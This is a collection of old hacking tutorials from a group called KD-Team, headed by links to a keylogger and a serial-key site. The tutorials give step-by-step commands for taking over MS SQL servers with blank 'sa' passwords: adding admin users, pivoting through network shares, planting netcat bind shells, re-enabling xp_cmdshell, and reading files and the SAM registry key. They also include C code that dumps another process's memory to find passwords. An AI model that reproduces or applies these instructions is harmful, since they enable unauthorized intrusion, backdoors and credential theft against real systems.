Informatii utile pentru securitatea ta si al computerului tau!
http://www.ardamax.com/keylogger/
http://www.theserials.com/serial/serial_ardamax.html
http://phpnet.us/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+This is a little Disclaimer for if you havn't read the one on our site. +
+The tools and tutorials KD-Team develops and publishes are only ment for +
+educational purpose only.WE DO NOT encourage the use of this tools and +
+tutorials for mailicious purpose.We learned a lot during the development of them +
+so we hope you also learn and don't just use it without any brains. +
+We take completly NO responsability for any damage caused by them nor +
+are we or our isp responsible for what you do with them. +
+Greetz: KD-Team +
+http://www.kd-team.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQL- Possible situation and solutions to it.
Written By: kd-team
Some info is from other tutorials thx to the peeps who wrote them.
Well this tut is intended for the harder machines that are not so easy to hack.
1.) a machine with a intern ip number
2.) a machine in a network with no rights to write to the local harddisk
3.) a alternative shell to the normal sqlexec.exe
4.) A bit of maybe usefull words
______________________________________
1.) a machine with a intern ip number |
______________________________________
*********Solution Number 1:************************
Thx to dD for the initial tutorial.
Let's say you hack a machine with the normal sa/blank pass and when you do ipconfig
it says 10.0.0.15 or 192.53.56.12.
The first thing to do is to check if it has firewall if that is not the case then look
if port 135 = open or port 3389.
Add yourself as a new user or change the password of the admin
change: net user Admin newpass
new: net user test password /add
When you've done this you can connect with remote desktop to 3389 and use the user/pass
or just do it the traditional NT way :)
*********Solution Number 2:************************
Always when you have a machine with a internal ip number it means that it is part of a network
that means 2 things that is has ports forwarded that's how you hacked it the port of SQL = forwarded
pretty dumb but ohwell :) and it also means that there is another machine who has a normal ip or a
router.
If it is a normal machine then they have used software things and 2 network card to make a network if
this is the case you can still run a ftp server on it.
first you've got to do is find out what the main server could be :)
view computers on te network: net view
usually it has normal names to recognize like Server2000, PrimaryPc, Server, MainServer etc
Ones you've find that out you've got to see if they have shares
share command: net view \\MainServer
if they've got like C shared or something like that you can just connect to it :) with no password.
connect command: net use Z: \\MainServer\C
then change to the new mapped drive. Now comes the tricky part.
When you are on the share of the server you've got to install a bouncer or a redirector :)
that is a thing that redirects the connection a port to another port or IP.
For this example I'll use Bouncer already posted at the board:)
you run it (it's best to install it as a service bouncer itself has no service option but it can still be done)
command for bouncer: bouncer.exe --port 1234 --destination 192.53.56.12:1234 --daemon
little info on this line :) --port = the listening port on the server machine
--destination = the intern ip to where it sshould be bounced or redirected the incomming traffic.
when this is done just run you're favo ftp server on the intern machine and all connection will get there.
_________________________________________________________________________
2.) a machine in a network with no rights to write to the local harddisk |
_________________________________________________________________________
When you have a machine that when you use ftp or tftp says that it can't write to local harddisk.
Then just used the method explained above to hack it on the NT way :)
because even though you can't write to the harddisk you usually still can add users etc :)
__________________________________________________
3.) a alternative shell to the normal sqlexec.exe |
__________________________________________________
Usually when you have got sqlexec connected and you are working with it usually you get errors like:
SQL_NO_DATA
SQL_ERROR
and then you just can't do anything with it :) well here a simple but effective way to get a other shell.
if tftp or ftp works just upload nc.exe(netcat can found everywhere on the net).
ones uploaded there are 2 commands you can use:
command1: nc.exe -l -p 1234 -d -e cmd.exe
command2: nc.exe -p 1234 -L -d -e cmd.exe
first of all it is NOT WISE to install nc as a service since it doesn't have password protection that
means that anyone can take over the machine :)
nou explanation of the commands:
command1: this is a use and dump command it means that you can connect only ones to it after you disconnet
it is gone :) then you've got to do it all over again with sql.
But as said before this shell is intended to make the hack easier and not as backdoor.
command2: with this command nc keeps listening so after you disconnect you can reconnect again.
this is only handy if you are hacking a network and need to disconnect to do other things or something
like that but not recomended because if someone finds it bye bye stro :) you can stop this by killing nc
after you are done.
_________________________________
4.) A bit of maybe usefull words |
_________________________________
When you are hacking or you wanna learn to hack plz make a diference for yourself I mean
make up you're mind if you wannabee super fxp/defacing dude (100boxes in 1 hour) OR
you wanna learn to hack interesting shit :)
for the first peeps this tut is useless because it is time consuming so just use the normal and fast shit
skip networks and such things
for the second peeps tut it can be usefull because it mixes a few ways together so at the end you have
control of the machine.
Last thing to say :)
Hack away but keep it nice ;)
Greetz,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+This is a little Disclaimer for if you havn't read the one on our site. +
+The tools and tutorials KD-Team develops and publishes are only ment for +
+educational purpose only.WE DO NOT encourage the use of this tools and +
+tutorials for mailicious purpose.We learned a lot during the development of them +
+so we hope you also learn and don't just use it without any brains. +
+We take completly NO responsability for any damage caused by them nor +
+are we or our isp responsible for what you do with them. +
+Greetz: KD-Team +
+http://www.kd-team.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***********************************************************************************************
*Hacking Secured SQL Servers *
*Tutorial Written By: kd-team *
*Creditz: Swiv,www.google.com,www.sqlsecurity.com *
*Use on you're own Risk. *
*All the things in here will only work if the corresponding .dll files exist and are original.*
***********************************************************************************************
0) Index
1) Tools Needed
2) The Easiest Way
3) Restoring xp_cmdshell
4) Reading almost any file on server
5) Reading The Registry
7) Final Words
0) Index
This tutorial is intended as a guide to hack the secured sql servers. Conentrating on the well
known SQL_ERROR respons.
This means:
- Hack sql servers that has only got a normmal user pass
- Hack sql servers where the stored proceduure xp_cmdshell has been disabled
This DOESN'T mean:
- Hack sql servers where the .dll has been changed or switched with another one.
- Explaining how to bruteforce sql server aaccounts
Hope this tutorials is ofany use to those who want hack more things or just want to know things.
Plz bitch about this tut if things don't work but don't start bitching that it is to slow
to hack more then 10 machines a day.
I also want to thank Swiv for his time to answer my question and to his portion of contribution to this
tutorial.
1) Tools Needed
- A server with port 1433 open and the corrrect username/password
- osql.exe
- sqlexec.exe written by sunx (the 1 with tthat has the green apple as icon)
ALSO keep in mind that all of the given commands only work if they are enabled else it will fail
*********************************************************************************************************
2) The Easiest Way
First of all make shure you use the correct sqlexec version and not "sqlexec for nethacker 1.0"
So use sqlexec.exe that has a green apple als icon.
When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't got
that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways
of sending the data to the sql server.
The options:
1 xp_cmdshell"%s"
2 select * from openrowset etc
3 create procedure #proc_temp etc
4 %s
Option 1 is the same as in "sqlexec for nethacker 1.0" So when "sqlexec for nethacker 1.0" gives a
SQL_ERROR this app wil do also BUT when selecting option 2 most of the time you will be able to hack
the server in normal way.
*********************************************************************************************************
3) Restoring xp_cmdshell
Restoring xp_cmdshell seems like difficult task but in fact it is easy.
first of all this only works when the stored procedure xp_cmdshell is dropt if the .dll has been changed
then it won't work.
Tis is only intended when the easy way doesn't work but most of the time it does.
Put the following in a .txt(example: restore.txt) and save it in te same directory as osql.exe is
//////////////////////////////////////////////////////////////////////////////////////////////////////
use master /
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'/
go /
//////////////////////////////////////////////////////////////////////////////////////////////////////
The above path depends on the installation of MSSQL so it can be different under some circumstances.
when done execute osql.exe like this:
osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt
Now if everything went how it is supposed to go, the xp_cmdshell is enabled again and you can use option
1 from sqlexec or the other app to hack the machine.
If you want to view all stored procedure on the server currently in youre power execute osql like:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures"
Keep in mind that this also has got procedures made by a admin and maybe hasn't got the standard ones.
*********************************************************************************************************
4) Reading almost any file on server
I say any because sometimes when the file is to big it refuses to read it. It also refuses to read when
the file is in use.
First of all check if the file is on the server before attempting to read it for that execute osql like:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'"
If the file exists it will give back some numbers meaning filesize,date etc.
When teh respond was a positive repost put the following in a .txt(example: read.txt) and make shure it
is in the same folder as osql.exe
////////////////////////////////////////////////////////
Create proc sp_readTextFile @filename sysname /
as /
begin /
set nocount on /
Create table #tempfile (line varchar(8000)) /
exec ('bulk insert #tempfile from "' + @filename + '"')/
select * from #tempfile /
drop table #tempfile /
End /
go /
////////////////////////////////////////////////////////
when done execute osql.exe like this:
osql.exe -S 123.123.123.123 -U sa -P "" -i read.txt
You have now succesfully created a stored procedure to read files.Now how doyou read files with it?
Very simple use osql.exe like this:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txt
Then just browse to youre local C: and there you will find the file.Only problem is there will be a lot
of wite stripes and "-" character that is the normal sql output way I can't do anything about that.
*********************************************************************************************************
5) Reading The Registry
Reading the registry cna be handy when there is valuable information stored into it like passwords or
usernames.
I'll give a little example on how to read the sam file just take 1 note even if you read the sam file on
a win2k machine it is useless because of the standard security it has. Explanation on what you can do
with registry reading will be explained later.
Fire up osql.exe and execute it like this:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread ‘HKEY_LOCAL_MACHINE’, ‘SECURITY\SAM\Domains\Account’, ‘F’"
and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5
the password of the SA user is stored in plain text could be handy if you hack a machine that has sql
running and the hack has got no super user rights like IISMEDIA exploit. then just grab the sql pass
from the registry.
*********************************************************************************************************
6) Final Words
Hope this has been of some help I can give NO garantee everything in here will work under different
circumstances. But all citics are welcome.
Further I have spend some time investigating all this and trying to explain it in a simple as possible way
so I say again don't bitch if this ain't good enough for mass-hacking.
For the rest keep learning and finding out things peeps :) Hacking is something you gotta feel.
Don't be lame, don't be lazy try thinigs yourself it really pays back.
1 final note:
I did not give scenario's and solutions on purpose I hope that with he info that is in this paper
you all will have enough imagination to hack something with it. Maybe later on I will make a scenario
and solutions paper about this.
Greetz,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+This is a little Disclaimer for if you havn't read the one on our site. +
+The tools and tutorials KD-Team develops and publishes are only ment for +
+educational purpose only.WE DO NOT encourage the use of this tools and +
+tutorials for mailicious purpose.We learned a lot during the development of them +
+so we hope you also learn and don't just use it without any brains. +
+We take completly NO responsability for any damage caused by them nor +
+are we or our isp responsible for what you do with them. +
+Greetz: KD-Team +
+http://www.kd-team.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tutorial On How To Read Memory In C
Written By: kd-team
Turn wordwrapping one, in some editors it reads better.
1) Intro
2) Why Read Memory?
3) Reading Memory
4) Last Words
1) Intro
Well here is another tutorial of me :) This time it will be lotsa concentrated on coding instead of just entering commands in some app to let it do what you want. Hope that with this little tut more people get interested to code things and step of the batch idea ( I am NOT saying batch is bad but only that coding with a programming language give you more power/control of the machine).
This is my first tutorial on a somewhat more advanced topic so if I make big mistakes regarding the topic bitchslap me :D else uhm just warn me then bitchslap me.
Well think that I have bullshitted enough now :D so let's get on with the next section.
2) Why Read Memory?
Hmm that is a good question but luckily this question has got a answer.
Like you know all application use memory so it has to have some proper used wouldn't you think?
Well they do but we are not gonna discuss all of them uses in here. What I want to make clear here is that some programs store the password unencrypted in the memory* cause they think it won't be read since it's there such a short period of time(other cases it may be a long period). So this could be one of the purposes to write a memory dumper.
3) Reading Memory
Well to read memory you need a few different things but I am trying to walk you through and explain everything as good as possible.
#include//for input output of things.
#include//So we can use windows functions
Well first we need a proccess id we can do this by code but this time we will just get it with the help of some program or in xp with tasklist just pick a proccess id of which you would like to read the memory. Why you need a proccess id you ask? well cause some of the function we are gonna use require it.
Also take note that some processes protect themselves by making parts of memory not readable so then you
just get error.
void main(int argc,char *argv[])
{
//first let's declare some vars
char buf[24000]; //this is the buffer where the read memory is stored
DWORD bufsize = sizeof(buf); //here defina how much bytes we are gonna read
DWORD hPID=0; //just defining a standard pid
HANDLE hReadp; //handle that will hold the return of the openprocess funtion
//since we don't use code to get the process pid we will just ask the user for it here.
printf("Enter Process Id: ");
scanf("%d",&hPID);
//here we use the OpenProcess funtion to open the desired process with the necessary rights.
hReadp = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE, hPID);
if(NULL != hReadp)
{
/*
The actual reading of the memory adres
first var is the handle that OpenProcess returned
the 0x400000 is the base adres (almost)all .exe in win32 use that.
the next 2 vars we already discussed them when declaring them.
last var returns into a buffer how many bytes where read so if not interested
you can leave it NULL
if I am correct all processes have memory from 0x000000 till 0xffffff so that would be the whole space you have to read and find possible interesting things in it.
*/
int ret = ReadProcessMemory(hReadp,(LPCVOID)0x400000, &buf, bufsize,NULL);
if(ret<=0)
{
printf("failed %d\n",GetLastError());
}
if(ret>0)
{
//Here we will be printing the buffer that holds the memory info
for(int e=0;e<=sizeof(buf);e++)
printf("%c",buf[e]);
}
}
//close the handle that we got from OpenProcess
CloseHandle(hReadp);
}
4) Last Words
Well this was my first tut concerning code.
Hope you all liked it and it was usefull and answered some of your questions.
I kinda just started with C only been with it like 3 month with some pauses in between so my code ain't the prettiest one out there or the best optimised. Suggestions are always welcome I just won't be updating this document since this is just a little tut for simple memreading nothing fancy. Cause there are more things to automated some things in here like the baseadres and the pid etc.
Well enjoy and have fun with it.
Oh and plz excuse my english.
Greetz:
KD-Team
* a good paper on passwords and memory is the pdf written by: Abhishek Kumar Titled: Discovering passwords in the memory
